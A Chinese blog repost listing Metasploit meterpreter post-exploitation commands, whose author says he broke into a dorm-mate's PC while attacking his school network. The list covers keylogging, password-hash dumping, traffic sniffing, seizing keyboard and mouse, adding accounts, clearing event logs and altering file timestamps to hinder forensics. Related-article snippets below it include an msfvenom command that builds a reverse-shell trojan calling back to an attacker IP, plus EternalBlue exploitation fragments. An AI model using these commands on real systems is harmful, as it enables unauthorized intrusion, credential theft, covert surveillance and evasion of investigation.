msf提权命令/meterpreter下的几个命令

最新推荐文章于 2024-05-20 08:33:57 发布
最新推荐文章于 2024-05-20 08:33:57 发布
阅读量612 收藏 1
点赞数
文章标签: 操作系统 shell 数据库
原文链接:http://www.cnblogs.com/xishaonian/p/6787081.html
版权

废话:

今天本来日学校内网。以为是台08.结果稀里糊涂居然日了宿舍哥们儿的PC机。按道理都该装杀毒的才对,我舍友都不装的。裸装上阵说的就是我舍友了。劝各位大佬。把杀毒装好。补丁打好。

通过这次我也学到了以下几个msf提权相关的命令:

 

切换到另一个用户界面(该功能基于那些用户已登录)。
screenshot
 
对目标主机的屏幕进行截图。
upload file
 
向目标主机上传文件。
download file
 
从目标主机下载文件。
keyscan_start
 
针对远程目标主机开启键盘记录功能。
keyscan_dump
 
存储目标主机上捕获的键盘记录。
keyscan_stop
 
停止针对目标主机的键盘记录。
getprivs
 
尽可能多的获取目标主机上的特权。
uictl enable keyboard/mouse
 
接管目标主机的键盘和鼠标。
background
 
将你当前的metasploit shell转为后台执行。
hashdump
 
导出目标主机中的口令哈希值。
use sniffer
 
加载嗅探模式。
sniffer_interfaces
 
列出目标主机所有开放的网络端口。
sniffer_dump interfaceID pcapname
 
在目标主机上启动嗅探。
sniffer_start interfaceID packet-buffer
 
在目标主机上针对特定范围的数据包缓冲区启动嗅探。
sniffer_stats interfaceID
 
获取正在实施嗅探网络接口的统计数据。
sniffer_stop interfaceID
 
停止嗅探。
add_user username password -h ip
 
在远程目标主机上添加一个用户。
clearev
 
清楚目标主机上的日志记录。
timestomp
 
修改文件属性,例如修改文件的创建时间(反取证调查)。
reboot

转载于:https://www.cnblogs.com/xishaonian/p/6787081.html

aiquan9342
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metepreter命令
sunshine19871211的博客
04-14 997
https://xz.aliyun.com/t/2536 meterpreter后渗透命令 background 将会话切换到后台 sessions -l sessions -i 2 启动一个shell或一个meterpreter sessions -k 2 杀死shell upload /root/桌面/payload.txt c: edit payload.txt cat ls c: ...
Meterpreter详解
子曰小玖的博客
08-08 3189
0x01 Meterpreter自动 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windo...
使用MSF进行(windows、linux、wesng使用
最新发布
dzqxwzoe的博客
05-20 767
MSF Windows​​​反弹shell​​​​​​END推荐阅读​​​MSF Linux​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
永恒之蓝(ms017-010)漏洞利用
菜鸟-传奇
04-09 1589
永恒之蓝(ms017-010)漏洞利用 1、实验环境 靶机win7 地址:192.168.1.xxx 登录密码:xxxx 攻击机:kaillinux 地址:192.168.1.xxx 登录用户名:root 登录密码:xxx 2、实验原理: “永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。 445端口简介: 445端口是一个毁誉参半的端口,有了它我们可以...
12.1、后渗透测试--
无痕的博客
12-13 728
meterpreter后渗透阶段
Metasploit的和后渗透
Kali与编程
12-04 1527
后渗透技术包括、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、高攻击者的限、绕过防御措施等。在本文中,我将详细介绍Metasploit的模块和技术,包括Windows和Linux系统下的模块和技术,以及如何使用Metasploit进行攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
3. bind_tcp:这种模式下,Meterpreter 会在目标系统上开启一个监听端口,等待攻击者连接。 0x03 相关 Payload Meterpreter 可以嵌入到多种类型的 payload 中,如 DLL、EXE、PE 文件等,以适应不同的渗透测试场景...
msf命令全集
06-05
MSF 命令全集 MSF(Metasploit Framework)是一款功能强大且功能丰富的渗透测试工具,供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释: 基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:...
利用Metasploit进行Linux
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
msf命令汇总
06-21
msf的一些实用命令 希望有用 尤其是对初学者帮助会很大
MSF终端命令.txt
02-24
msf的一些终端命令
cmd反弹shell
10-24
cmd反弹shell
使用MSF进行(windows、linux、wesng使用)
Love&Share
11-22 2万+
文章目录MSF Windows反弹shellEND推荐阅读MSF Linux反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows 靶机: Win server2003 + iis(已.
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和(上)
m0_61506558的博客
09-01 4433
创建之前要是系统限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个示就需要先(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有成功 需要在还终端内在输入 getsystem 获取限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
Windows系统姿势
懂进攻知防守
08-11 4701
攻击者通过安全漏洞把获取到的受限制的低限用户突破限制,到高限的管理员用户,从而获得对整个系统得控制
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8232
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
meterpreter小结
MercyLin的博客
09-05 2977
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行 首先我们可以输入getuid来查看当前用户的限~ 可以看到我们貌似可能是管理员限,到底是不是还有待验证,我们的最终目的是将其升到system限. getsystem自动 输入getsystem来尝试,MSF会自动选择合适的方式来升当前限 这个就比较玄学,我还没成功过,可以看到g...
ms17-010直接拿meterpreter
qq_38240166的博客
03-07 8318
小白,第一次写博客,轻喷写的不好请指出最近无聊就装了个msf玩玩ms17-010,只要你开了445端口,又没打补丁,那就很容易gg先开个msf进一下利用模块。然后简单的设置一下ip和payload。设置完开始攻击这样子就获得一个会话。输入shell看看发现乱码,调一下编码就行了。第一次玩msf,所以看了两天的书才搞懂这些...
Metasploit 学习笔记
热门推荐
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值